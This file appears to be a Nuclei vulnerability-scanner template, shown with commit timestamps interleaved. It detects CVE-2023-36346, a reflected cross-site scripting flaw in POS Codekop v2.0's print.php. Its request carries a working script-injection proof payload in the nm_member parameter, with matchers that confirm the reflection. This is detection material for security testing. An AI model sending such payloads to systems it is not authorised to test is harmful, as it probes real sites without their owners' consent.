nuclei-templates/http/cves/2023/CVE-2023-36346.yaml

50 lines
1.3 KiB
YAML
Raw Normal View History

2023-07-07 09:38:49 +00:00
id: CVE-2023-36346
info:
2023-07-07 10:15:56 +00:00
name: POS Codekop v2.0 - Cross-site Scripting
2023-07-07 09:38:49 +00:00
author: r3Y3r53
severity: medium
description: |
POS Codekop v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the nm_member parameter at print.php.
reference:
- https://yuyudhn.github.io/pos-codekop-vulnerability/
- https://www.youtube.com/watch?v=bbbA-q1syrA
- https://nvd.nist.gov/vuln/detail/CVE-2023-36346
2023-07-11 19:49:27 +00:00
- http://packetstormsecurity.com/files/173280/Sales-Of-Cashier-Goods-1.0-Cross-Site-Scripting.html
2023-07-07 09:38:49 +00:00
classification:
2023-07-11 19:49:27 +00:00
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2023-07-07 09:38:49 +00:00
cvss-score: 6.1
2023-07-11 19:49:27 +00:00
cve-id: CVE-2023-36346
2023-07-07 09:38:49 +00:00
cwe-id: CWE-79
2023-07-11 19:49:27 +00:00
epss-score: 0.00075
cpe: cpe:2.3:a:codekop:codekop:2.0:*:*:*:*:*:*:*
2023-07-07 09:38:49 +00:00
metadata:
max-request: 1
2023-07-07 09:38:49 +00:00
verified: "true"
2023-07-11 19:49:27 +00:00
vendor: codekop
product: codekop
2023-07-07 10:02:52 +00:00
tags: cve,cve2023,xss,pos,codekop,unauth
2023-07-07 09:38:49 +00:00
2023-07-08 06:23:21 +00:00
http:
2023-07-07 09:38:49 +00:00
- method: GET
path:
- "{{BaseURL}}/print.php?nm_member=<script>alert(document.location)</script>"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert(document.location)</script>"
2023-07-08 06:43:35 +00:00
- "<title>print</title>"
2023-07-07 09:38:49 +00:00
condition: and
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200